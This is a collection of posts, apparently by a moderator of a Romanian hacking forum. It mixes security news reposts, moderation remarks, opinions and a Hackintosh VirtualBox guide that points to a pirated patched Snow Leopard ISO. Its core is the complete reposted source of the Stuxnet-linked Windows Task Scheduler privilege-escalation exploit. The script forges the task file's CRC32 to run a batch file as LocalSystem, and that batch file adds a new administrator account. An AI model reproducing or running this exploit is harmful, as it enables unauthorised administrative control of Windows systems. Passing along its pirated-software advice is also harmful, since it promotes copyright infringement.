Nytro

Internet Explorer 9 introduce instrumentul anti-tracking pe Web de Cristina Enescu | 8 decembrie 2010 Browser-ul Microsoft IE9 va avea instrumente care vor restrictiona colectarea datelor despre activitatea online a utilizatorului, impiedicand astfel ca site-urile vizitate sa impartaseasca informatii despre activitatea acestuia pe Web. Vestea vine pe fondul criticilor adresate de guvernul Statelor Unite industriei de computere, legate de progresul lent in domeniul protejarii confidentialitatii utilizatorului. Intr-o postare pe blog, Microsoft a declarat ca oamenii nu isi dau seama ca atunci cand viziteaza un site, informatiile legate de ceea ce cauta sau cumpara ajung adesea in posesia altor companii, fara ca utilizatorii sa fie instiintati. Odata cu IE9, Microsoft planuieste sa introduca ceea ce numeste “Tracking Protection List”, care, potrivit companiei, se comporta asemeni listei “Do Not Call” ce limiteaza numarul persoanelor care pot fi sunate de firmele de marketing. Utilizatorii vor putea sa creeze liste prin care datele lor vor putea fi impartasite numai pe site-urile alese chiar de ei. Cand va fi pornit, sistemul ar putea impiedica vizualizarea anumitor reclame sau a altor functii in momentul in care utilizatorii viziteaza site-urile respective. Oricine va putea sa scrie o lista si sa o impartaseasca cu altii pentru a avea parte de aceeasi protectie, a declarat Microsoft. Compania planuieste, de asemenea, sa lanseze formatele si standardele pentru liste sub o licenta libera, pentru a putea fi adoptate si de alte browsere. Microsoft a mai adaugat ca primele versiuni ale acestor noi functii vor fi incluse in versiunea IE9, programata pentru lansare la inceputul lui 2011. Sursa: Internet Explorer 9 introduce instrumentul anti-tracking pe Web | Hit.ro

Am observat ca sunt unele probleme in legatura cu mail-ul de activare al unui cont nou creat. Daca v-ati creat un cont si nu ati primit mail-ul de activare, trimiteti-mi un MP si se rezolva. Nu va voi retrimite un email de activare ci va voi activa eu contul.

Nu trebuie sa le citesti pe toate, ar fi absurd, citeste fiecare ce anume il intereseaza.

How to Run Mac OS X in VirtualBox on Windows Author: Bobby Patton Sursa: How to Run Mac OS X in VirtualBox on Windows We've shown you how to install Snow Leopard in VMWare, but if you haven't purchased VMWare, you can now do it using previously mentioned, free program VirtualBox. Apart from VirtualBox, you'll also need an OSX86 ISO. The group Hazard has put out a good patched Snow Leopard installer that should do fine (just search for it on Google). Of course, if you feel bad about downloading the ISO of Snow Leopard, you could always go buy a copy to feel a bit better, karmically. After you have them both, install Virtualbox. Open up Virtualbox and click on New at the top left. At the Create New Virtual Machine window, click Next. At this window type OSX as the name and it will automatically change the system and version. The next window will let you choose your RAM amount: If you can spare it, crank it up as far as you can go, but 1024MB should be sufficient. This is where you'll make your hard disk. 20GB should be enough so what it comes down to is dynamic or static. Dynamic will expand on use and Static will be a fixed 20GB no matter how much data is actually in it. Dynamic is better for not taking up your hard drive but static should give you better performance. I normally use dynamic. Click next unless you want to change it from dynamic or if you want to increase the disk size or file location. It will show a summary of your settings. Click Finish, then click Settings at the top. At this window click on System in the left pane and uncheck Enable EFI. Now click on the Storage button on the left. From there click on Empty under the OSX.vdi, then click the folder with the green arrow on the right (next to "CD/DVD Device"). At this window click the Add button at the top. Then find and add the OSX86 ISO you downloaded earlier. Then highlight it and click Select at the bottom. Then click OK, and hit the Start button on the left side of the main VirtualBox window. As it starts up, click inside the window and hit F8. Then at the boot: prompt type –v so you can see what exactly went wrong if something does go wrong. All the services will run and eventually you should come to the language screen. Choose your language then click next. If you are unable to move your mouse around then hit Right-Ctrl + I. Click Continue and Agree. Next, start up Disk Utility by going to Utilities in the menu bar. At this screen highlight 20GB VBOX HARDDISK. Then click the Erase tab, name it what you want in the name box and click the Erase button on the bottom right of the window. It shouldn't take long. Then click Disk Utility in your menu bar and quit it. Now you're back at the installer. Highlight the drive that is now showing up and click Continue. The next window is important. Click the Customize button on the bottom left. AMD Users check: Any Updates included at the top. Drop down Kernels and choose Legacy kernel. AMD option below System support. Intel Users check: Any Updates included at the top. Drop down bootloaders and check the newest Chameleon. Drop down Kernels and choose Legacy kernel. Then click Done and hit the Install button. To speed up the process you can click Skip when the disc check pops up. As soon as it says "installation finished" and starts counting down to restart, press the right Ctrl key. Click on Devices at the top of the VirtualBox window, hit CD/DVD Devices and click Unmount CD/DVD Device. Then go to Machine > Reset and click Reset at the prompt. Next you'll see the Chameleon loader and then OS X will begin to boot. After it boots you will see the setup screens for OS X! You're good to go. The only hiccup I've found is that it can only be virtualized with one core. It could be the OSX disc I was using or it might not be. And I have yet to find the right kext that will allow audio to work and the resolution is limited also. But other than that you'll have a fully functioning OSX virtualized! Update: I'd like to post some answers to the resolution and audio. I should have looked around before posting this but I just didn't have the time. So anyways heres what you can do: To fix the resolution issue, open Finder and go to the OS X drive on the left. Open the folder called Extras. Right Click on the file com.Apple.Boot.plist and open it with TextEdit. Under the first insert this: Graphics Mode 1280x1024x32 or another compatible resolution. Select "Save As" at the top and save it to the desktop, unchecking the check under Unicode and then save it as com.apple.boot.plist. After that drag and drop it into the extras folder and overwrite the original file, entering your password when prompted. Instructions for the sound issue can be found here. Don't install system updates. If you want updates you'll have to install another iso distribution with the updates on it. If you install the updates directly from apple it messes with the custom kexts and chameleon. Just a forewarning. And for those of you getting boot issues try choosing a different version of Chameleon or a different kernel. Sometimes that seems to help. And If your getting one of the USB errors then try disabling USB in the VirtualBox settings and see if that helps. Tek411: OSX in Virtual Box (Hackintoshed VM)

Mue recaptcha. Orice, numai aia nu.

Vim si Emacs e naspa. Notepad++, Gedit si Kwrite imi plac.

Lumea inca e de parere ca hackerii sunt niste singuratici rupti de lume care lucreaza la subsolul unei case si ca nu au nici o legatura cu lumea exterioara, trist.

Ban amandoi 2 zile, sa va mai calmati.

Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal de Laurentiu Crisu | 3 decembrie 2010 Saptamana aceasta va avea loc cea de-a doua editie a competitiei Random Hacks of Kindness (RHoK), care se va desfasura in mai multe orase din intreaga lume si va aduce de aceeasi parte a baricadei atat hackerii cat si unii dintre cei mai buni ingineri software. Evenimentul, gazduit de Google, Microsoft, Yahoo, NASA si Banca Mondiala, se va desfasura pe 4-6 decembrie 2010 si isi propune sa foloseasca tehnologia pentru a face lumea un loc mai bun, prin construirea unei comunitati de inovatie. “Hackathon-ul”, dupa cum l-au numit reprezentantii, aduce laolalta cei mai talentati hackeri din toate colturile lumii, dezvoltatori de software si experti in computere, care isi dedica timpul pentru a rezolva probleme din lumea reala. La sfarsitul celor doua zile de concurs, o aplicatie va selecta echipa care merita titlul de “RHoKstars”. Hack-urile castigatore in cadrul primei editii a acestei competitii au fost folosite pentru a furniza asistenta de urgenta in timpul cutremurelor din Haiti si Chile. “Evenimentul le ofera hacker-ilor oportunitatea de a-si folosi abilitatile in scopuri nobile, sub indrumarea expertilor care inteleg provocarile vietii reale”, a declarat Todd Khozein, reprezentant al RHoK. Din pacate, niciun oras din Romania nu va gazdui acest concurs. Pentru cei care isi doresc insa sa participe, cea mai apropiata locatie de tara noastra ar fi Berlin, Germania. Sursa: Google, Microsoft, NASA si Yahoo organizeaza competitia de hacking legal | Hit.ro

E mult mai rapida versiunea simpla, ai doar o comparatie si o atribuire, nu o gramada de calcule. In plus apelezi 2 functii, si apelurile de functii sunt consumatoare si de resurse (stiva) si de procesor (revenire din functie...). Dar asta conteaza doar daca faci milioane de apeluri ale functie pentru maxim.

Ratati care isi dau credite pentru multe lucruri cu care nu au nici o legatura. Copiaza exploituri din diverse locuri. Foarte probabil skids. Exploits Database by Offensive Security

Fara Java sau Flash, fisierele se pot descarca de catre altcineva in timp ce se uploadeaza... http://ge.tt/

1) Cu ce te ajuta asta? 2) Sunt intrebari care nu primesc nici un raspuns, in veci, ai atata rabdare? De ce sa nu se raspunda la o intrebare? 3) Care e rostul, invatam sa numaram? Idei stupide.

Dupa cum observati, categoria Offtopic este foarte vizitata, deoarece acolo se posteaza tot felul de lucruri, mai mult sau mai putin utile. Problema apare cand se posteaza si lucruri care isi au locul in alta parte, de cele mai multe ori cererile de diverse lucruri si cererea ajutorului in diverse probleme. Aceste subiecte au categorii speciale in care sa se poata posta, "Cereri" si "Ajutor". Nu vad de ce sa se posteze totul la "Offtopic". Sectiunea este pentru posturile care nu se incadreaza in alte categorii. Desigur, cred ca sunt mai mari sansele sa primiti un raspuns la "Offtopic" decat la locul special, pentru ca e o categorie mai vizitata, dar se va ajunge la balamuc astfel. Dupa cum o parte dintre voi ati observat, daca veti posta intr-o categorie gresita (nu numai la "Offtopic") veti primi un avertisment. Asadar, inainte de a deschide un topic, cititi si numele categoriilor, si descrierile lor daca nu ati inteles ce anume se posteaza in acele categorii. Intr-adevar, daca doriti sa postati un tutorial despre programare, nu va voi sanctiona daca alegeti sa il postati la "Tutoriale Romana/Engleza" sau "Programare", din simplul motiv ca se incadreaza in ambele categorii si in plus este si ceva util care ajuta membrii forumului. Insa daca veti posta toate prostiile anapoda veti fi avertizati. Inca o data, putina atentie inainte de a posta.

Modul de vedere ("Birds eye") din satelit e excelent. Incercati, sunt sigur ca o sa va placa. http://www.bing.com/maps/ Sincer, nu se compara Yahoo! si Google cu asa ceva... 1 - 0 pentru Microsoft din partea mea.

Probabil trimiti si tu 20 de mailuri cu istealer sa furi niste parole de messenger... Nu te speria, pe tine nu o sa te bage nimeni in seama. Da, daca cineva iti fura portofelul vrei sa intre la puscarie, daca cineva iti fura banii din cont de ce sa nu intre la puscarie? De fapt voi ati merita sa infundati puscariile, macar cei ce fura portofele "muncesc" sa le aiba, voi luati 2 programe care nu stiti ce fac si gata, sunteti hackeri cu bani. La cateva sute de euro nu se uita nimeni, daca ai fi baiat destept si ai face mai mult acum as posta o stire despre tine, dar sunt sigur ca nu o sa fie cazul.

"""Hacker""" Gets 18 Months in U.K. Prison Mai bine spus "Looser". Bun, am mai scapat de un hot. La puscarie cu toti cei ca el, la munca nu la intins mana. A Scottish man was sentenced today to 18 months in prison for spamming out e-mails laced with malware and stealing data. A 33-year-old Scottish man was sentenced today to 18 months in prison in the U.K. for spamming out malware-infected e-mails and stealing data. The sentencing today of Matthew Anderson of Drummuir, Aberdeenshire, Scotland, brought to an end to an investigation first launched four years ago. According to the Metropolitan Police Service (MPS), Anderson was part of a ring that targeted hundreds of businesses in the U.K. with malware starting in 2005. The conspiracy was operated by members of a cyber-crew called m00p that spammed out millions of e-mails laced with malware, authorities said. It was Anderson's job to manage the operation by composing the e-mails and distributing them with virus attachments, police said. The malware allowed Anderson to access private data stored on computers without the knowledge of the computer's owner, according to police. "This organized online criminal network infected huge numbers of computers around the world, especially targeting U.K. businesses and individuals," said Detective Constable Bob Burls, from the MPS Central e-Crime Unit, in a statement. "Matthew Anderson methodically exploited computer users not only for his own financial gain but also violating their privacy. They used sophisticated computer code to commit their crimes." The investigation resulted in the arrests of three men—including Anderson—on June 27, 2006. No charges were filed against one of the men, while the other pleaded guilty in 2008, according to reports. According to police, a number of computers were seized at residential addresses in both countries in addition to the suspects' servers as part of the investigation. When online, Anderson used the profile names of "aobuluz" and "warpigs," authorities said, and operated his illegal business behind the front of an online company called Optom Security that offered security software. Among the evidence police found were screenshots on Anderson's computers taken from other people's Webcams as well as copies of wills, medial reports, password lists and other content, police said. "The Internet means criminals have increased opportunities to commit crime internationally; however, I'd like to reassure the public that the international law enforcement and antivirus companies' response is increasingly sophisticated," Burls said. "As this case shows, criminals can't hide online and are being held to account for their actions. A complex investigation like this demonstrates what international cooperation can achieve." Sursa: Hacker Gets 18 Months in U.K. Prison - Security - News & Reviews

Exploit code for one of the zero-day vulnerabilities exploited by Stuxnet Exploit code for one of the zero-day vulnerabilities exploited by the Stuxnet worm has made its way online. The code exploits a Windows Task Scheduler vulnerability, and can be used to escalate privileges. The exploit code was added to the Exploit Database operated by Offensive Security Nov. 20. There is no patch currently available for the flaw, though Microsoft said one is forthcoming. “Microsoft is aware of the public posting of the details of an Elevation of Privilege vulnerability used by the Stuxnet malware,” Jerry Bryant, group manager of Response Communications at Microsoft, said in a statement. “We first discussed this vulnerability in September 2010. Because this is a local Elevation-of-Privilege issue, it requires attackers to be already able to execute code on a targeted machine. A bulletin addressing this issue will be released as part of our regular monthly bulletin cycle in the near future.” The vulnerability was one of four zero-days used by the malware in its bid to compromise industrial control systems. The three others have all been patched since the worm was discovered this summer. Researchers have spent the last several months trying to get to the bottom of the Stuxnet worm. Just recently, Symantec reported evidence that it targets frequency converter drives used to control the speed of motors, and that the actual goal of the worm may be to disrupt nuclear programs. In particular, speculation has focused on Iran as a possible target, as it has been the site of many of Stuxnet's infections. Among the other zero-days Stuxnet has been observed using are the .LNK shortcut vulnerability, patched in August; a vulnerability in the Windows Print Spooler service (MS10-061), patched in September; and another privilege escalation issue (MS10-073), patched in a massive update in October. Early versions of the worm also spread without a vulnerability at all; instead abusing How Stuxnet Malware Used AutoRun Trick to Infect PCs - Security - News & Reviews to compromise machines through infected USB devices. Sursa: Exploit Code for Windows Zero-Day Targeted by Stuxnet Goes Public - Security - News & Reviews

Windows Task Scheduler Privilege Escalation 0day # Exploit Title: Windows Task Scheduler Privilege Escalation 0day # Date: 20-11-2010 # Author: webDEViL # Tested on: Windows 7/2008 x86/x64 <job id="tasksch-wD-0day"> <script language="Javascript"> crc_table = new Array( 0x00000000, 0x77073096, 0xEE0E612C, 0x990951BA, 0x076DC419, 0x706AF48F, 0xE963A535, 0x9E6495A3, 0x0EDB8832, 0x79DCB8A4, 0xE0D5E91E, 0x97D2D988, 0x09B64C2B, 0x7EB17CBD, 0xE7B82D07, 0x90BF1D91, 0x1DB71064, 0x6AB020F2, 0xF3B97148, 0x84BE41DE, 0x1ADAD47D, 0x6DDDE4EB, 0xF4D4B551, 0x83D385C7, 0x136C9856, 0x646BA8C0, 0xFD62F97A, 0x8A65C9EC, 0x14015C4F, 0x63066CD9, 0xFA0F3D63, 0x8D080DF5, 0x3B6E20C8, 0x4C69105E, 0xD56041E4, 0xA2677172, 0x3C03E4D1, 0x4B04D447, 0xD20D85FD, 0xA50AB56B, 0x35B5A8FA, 0x42B2986C, 0xDBBBC9D6, 0xACBCF940, 0x32D86CE3, 0x45DF5C75, 0xDCD60DCF, 0xABD13D59, 0x26D930AC, 0x51DE003A, 0xC8D75180, 0xBFD06116, 0x21B4F4B5, 0x56B3C423, 0xCFBA9599, 0xB8BDA50F, 0x2802B89E, 0x5F058808, 0xC60CD9B2, 0xB10BE924, 0x2F6F7C87, 0x58684C11, 0xC1611DAB, 0xB6662D3D, 0x76DC4190, 0x01DB7106, 0x98D220BC, 0xEFD5102A, 0x71B18589, 0x06B6B51F, 0x9FBFE4A5, 0xE8B8D433, 0x7807C9A2, 0x0F00F934, 0x9609A88E, 0xE10E9818, 0x7F6A0DBB, 0x086D3D2D, 0x91646C97, 0xE6635C01, 0x6B6B51F4, 0x1C6C6162, 0x856530D8, 0xF262004E, 0x6C0695ED, 0x1B01A57B, 0x8208F4C1, 0xF50FC457, 0x65B0D9C6, 0x12B7E950, 0x8BBEB8EA, 0xFCB9887C, 0x62DD1DDF, 0x15DA2D49, 0x8CD37CF3, 0xFBD44C65, 0x4DB26158, 0x3AB551CE, 0xA3BC0074, 0xD4BB30E2, 0x4ADFA541, 0x3DD895D7, 0xA4D1C46D, 0xD3D6F4FB, 0x4369E96A, 0x346ED9FC, 0xAD678846, 0xDA60B8D0, 0x44042D73, 0x33031DE5, 0xAA0A4C5F, 0xDD0D7CC9, 0x5005713C, 0x270241AA, 0xBE0B1010, 0xC90C2086, 0x5768B525, 0x206F85B3, 0xB966D409, 0xCE61E49F, 0x5EDEF90E, 0x29D9C998, 0xB0D09822, 0xC7D7A8B4, 0x59B33D17, 0x2EB40D81, 0xB7BD5C3B, 0xC0BA6CAD, 0xEDB88320, 0x9ABFB3B6, 0x03B6E20C, 0x74B1D29A, 0xEAD54739, 0x9DD277AF, 0x04DB2615, 0x73DC1683, 0xE3630B12, 0x94643B84, 0x0D6D6A3E, 0x7A6A5AA8, 0xE40ECF0B, 0x9309FF9D, 0x0A00AE27, 0x7D079EB1, 0xF00F9344, 0x8708A3D2, 0x1E01F268, 0x6906C2FE, 0xF762575D, 0x806567CB, 0x196C3671, 0x6E6B06E7, 0xFED41B76, 0x89D32BE0, 0x10DA7A5A, 0x67DD4ACC, 0xF9B9DF6F, 0x8EBEEFF9, 0x17B7BE43, 0x60B08ED5, 0xD6D6A3E8, 0xA1D1937E, 0x38D8C2C4, 0x4FDFF252, 0xD1BB67F1, 0xA6BC5767, 0x3FB506DD, 0x48B2364B, 0xD80D2BDA, 0xAF0A1B4C, 0x36034AF6, 0x41047A60, 0xDF60EFC3, 0xA867DF55, 0x316E8EEF, 0x4669BE79, 0xCB61B38C, 0xBC66831A, 0x256FD2A0, 0x5268E236, 0xCC0C7795, 0xBB0B4703, 0x220216B9, 0x5505262F, 0xC5BA3BBE, 0xB2BD0B28, 0x2BB45A92, 0x5CB36A04, 0xC2D7FFA7, 0xB5D0CF31, 0x2CD99E8B, 0x5BDEAE1D, 0x9B64C2B0, 0xEC63F226, 0x756AA39C, 0x026D930A, 0x9C0906A9, 0xEB0E363F, 0x72076785, 0x05005713, 0x95BF4A82, 0xE2B87A14, 0x7BB12BAE, 0x0CB61B38, 0x92D28E9B, 0xE5D5BE0D, 0x7CDCEFB7, 0x0BDBDF21, 0x86D3D2D4, 0xF1D4E242, 0x68DDB3F8, 0x1FDA836E, 0x81BE16CD, 0xF6B9265B, 0x6FB077E1, 0x18B74777, 0x88085AE6, 0xFF0F6A70, 0x66063BCA, 0x11010B5C, 0x8F659EFF, 0xF862AE69, 0x616BFFD3, 0x166CCF45, 0xA00AE278, 0xD70DD2EE, 0x4E048354, 0x3903B3C2, 0xA7672661, 0xD06016F7, 0x4969474D, 0x3E6E77DB, 0xAED16A4A, 0xD9D65ADC, 0x40DF0B66, 0x37D83BF0, 0xA9BCAE53, 0xDEBB9EC5, 0x47B2CF7F, 0x30B5FFE9, 0xBDBDF21C, 0xCABAC28A, 0x53B39330, 0x24B4A3A6, 0xBAD03605, 0xCDD70693, 0x54DE5729, 0x23D967BF, 0xB3667A2E, 0xC4614AB8, 0x5D681B02, 0x2A6F2B94, 0xB40BBE37, 0xC30C8EA1, 0x5A05DF1B, 0x2D02EF8D ); var hD='0123456789ABCDEF'; function dec2hex(d) { h=''; for (i=0;i<8;i++) { h = hD.charAt(d&15)+h; d >>>= 4; } return h; } function encodeToHex(str){ var r=""; var e=str.length; var c=0; var h; while(c<e){ h=str.charCodeAt(c++).toString(16); while(h.length<3) h="0"+h; r+=h; } return r; } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } function calc_crc(anyForm) { anyTextString=decodeFromHex(anyForm); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; for (i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } Crc_value ^= 0xFFFFFFFF; return dec2hex(Crc_value); } function rev_crc(leadString,endString,crc32) { // // First, we calculate the CRC-32 for the initial string // anyTextString=decodeFromHex(leadString); Crc_value = 0xFFFFFFFF; StringLength=anyTextString.length; //document.write(alert(StringLength)); for (var i=0; i<StringLength; i++) { tableIndex = (anyTextString.charCodeAt(i) ^ Crc_value) & 0xFF; Table_value = crc_table[tableIndex]; Crc_value >>>= 8; Crc_value ^= Table_value; } // // Second, we calculate the CRC-32 without the final string // crc=parseInt(crc32,16); crc ^= 0xFFFFFFFF; anyTextString=decodeFromHex(endString); StringLength=anyTextString.length; for (var i=0; i<StringLength; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex ^ anyTextString.charCodeAt(StringLength - i -1); } // // Now let's find the 4-byte string // for (var i=0; i<4; i++) { tableIndex=0; Table_value = crc_table[tableIndex]; while (((Table_value ^ crc) >>> 24) & 0xFF) { tableIndex++; Table_value = crc_table[tableIndex]; } crc ^= Table_value; crc <<= 8; crc |= tableIndex; } crc ^= Crc_value; // // Finally, display the results // var TextString=dec2hex(crc); var Teststring=''; Teststring=TextString.substring(6,8); Teststring+=TextString.substring(4,6); Teststring+=TextString.substring(2,4); Teststring+=TextString.substring(0,2); return Teststring } function decodeFromHex(str){ var r=""; var e=str.length; var s=0; while(e>1){ r=r+String.fromCharCode("0x"+str.substring(s,s+2)); s=s+2; e=e-2; } return r; } </script> <script language="VBScript"> dim output set output = wscript.stdout output.writeline " Task Scheduler 0 day - Privilege Escalation " output.writeline " Should work on Vista/Win7/2008 x86/x64" output.writeline " webDEViL - w3bd3vil [at] gmail [dot] com" & vbCr & vbLf biatchFile = WScript.CreateObject("Scripting.FileSystemObject").GetSpecialFolder(2)+"\xpl.bat" Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /create /TN wDw00t /sc monthly /tr """+biatchFile+"""",,True Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.CreateTextFile(biatchFile, True) a.WriteLine ("net user /add test123 test123") a.WriteLine ("net localgroup administrators /add test123") a.WriteLine ("schtasks /delete /f /TN wDw00t") Function ReadByteArray(strFileName) Const adTypeBinary = 1 Dim bin Set bin = CreateObject("ADODB.Stream") bin.Type = adTypeBinary bin.Open bin.LoadFromFile strFileName ReadByteArray = bin.Read 'output.writeline ReadByteArray End Function Function OctetToHexStr (arrbytOctet) Dim k OctetToHexStr = "" For k = 3 To Lenb (arrbytOctet) OctetToHexStr = OctetToHexStr _ & Right("0" & Hex(Ascb(Midb(arrbytOctet, k, 1))), 2) Next End Function strFileName="C:\windows\system32\tasks\wDw00t" hexXML = OctetToHexStr (ReadByteArray(strFileName)) 'output.writeline hexXML crc32 = calc_crc(hexXML) output.writeline "Crc32 Original: "+crc32 Set xmlDoc = CreateObject("Microsoft.XMLDOM") 'permissions workaround 'objShell.Run "cmd /c copy C:\windows\system32\tasks\wDw00t .",,True 'objShell.Run "cmd /c schtasks /query /XML /TN wDw00t > wDw00t.xml",,True Set objShell = WScript.CreateObject("WScript.Shell") Set objExecObject = objShell.Exec("cmd /c schtasks /query /XML /TN wDw00t") Do Until objExecObject.StdOut.AtEndOfStream strLine = strLine & objExecObject.StdOut.ReadLine() Loop hexXML = "FFFE3C00"+OctetToHexStr(strLine) 'output.writeline hexXML Set ts = fso.createtextfile ("wDw00t.xml") For n = 1 To (Len (hexXML) - 1) step 2 ts.write Chr ("&h" & Mid (hexXML, n, 2)) Next ts.close xmlDoc.load "wDw00t.xml" Set Author = xmlDoc.selectsinglenode ("//Task/RegistrationInfo/Author") Author.text = "LocalSystem" Set UserId = xmlDoc.selectsinglenode ("//Task/Principals/Principal/UserId") UserId.text = "S-1-5-18" xmldoc.save(strFileName) hexXML = OctetToHexStr (ReadByteArray(strFileName)) leadString=hexXML+"3C0021002D002D00" endString="2D002D003E00" 'output.writeline leadString impbytes=rev_crc(leadString,endString,crc32) output.writeline "Crc32 Magic Bytes: "+impbytes finalString = leadString+impbytes+endString forge = calc_crc(finalString) output.writeline "Crc32 Forged: "+forge strHexString="FFFE"+finalString Set fso = CreateObject ("scripting.filesystemobject") Set stream = CreateObject ("adodb.stream") Set ts = fso.createtextfile (strFileName) For n = 1 To (Len (strHexString) - 1) step 2 ts.write Chr ("&h" & Mid (strHexString, n, 2)) Next ts.close Set objShell = CreateObject("WScript.Shell") objShell.Run "schtasks /change /TN wDw00t /disable",,True objShell.Run "schtasks /change /TN wDw00t /enable",,True objShell.Run "schtasks /run /TN wDw00t",,True </script> </job> E exploit-ul folosit de worm-ul Stuxnet. Sursa: Windows Task Scheduler Privilege Escalation 0day

MinGW e portarea (nu completa cred) a compilatorului GNU pentru Linux pe sisteme Windows. Si compilatoarele GNU respecta cel mai bine standardele internationale, nu ca produsele marca Microsoft care vin cu propriile idei.

Inca un topic demn de gunoi. Mai bine facea un browser, macar era facut de el...

E foarte bine pentru inceput, continua, vreau sa vad player-ul.

Facusem eu ceva pentru Linux, din iptables. Ideea e simpla. Din cate mi-am dat seama, cred ca trimite un bot (sunt multi, nu cred ca ii poti baga la ignore pe toti, na, poate nu vrei sa ii bagi la ignore pe toti care nu ii ai in lista, si nu stiu daca asta chiar va ajuta) un mesaj de "am schimbat avataru ba", si clientul de messenger trimite un raspuns, cam asa ceva, dar nu sunt sigur. Si eu am blocat accesul (DROP la pachete) de la sau catre (nu mai stiu) anumite IP-uri, care ulterior am descoperit ca sunt servere Yahoo!. Si intr-adevar, nu mai detectau daca sunt pe invizibil sau nu, dar nici nu mai primeam sau nu puteam trimite mesaje, sau cine stie ce alte probleme erau. Oricum, cred ca se poate face ceva. PS: Nu prea ma pricep, din iptables se pot face limitari in functie de continutul unui pachet, adica in functie de date? Ar fi de preferat ceva simplu cum ar fi "daca pachetul contine sirul/octetii xyz"... Sau orice altceva.

Da, ce bucurie, gasesti site-ul lu' nea Vasile si "il spargi"... Daca tot vreti sa va testati capacitatile, testati-le pe un site pe care aveti un motiv sa le testati, nu cautati acolo niste site-uri de 2 lei ca sa aveti ce posta la Show Off...

Din titlu, descriere si site-urile recomandate pare o mare, al dracu de mare, tampenie de doi lei.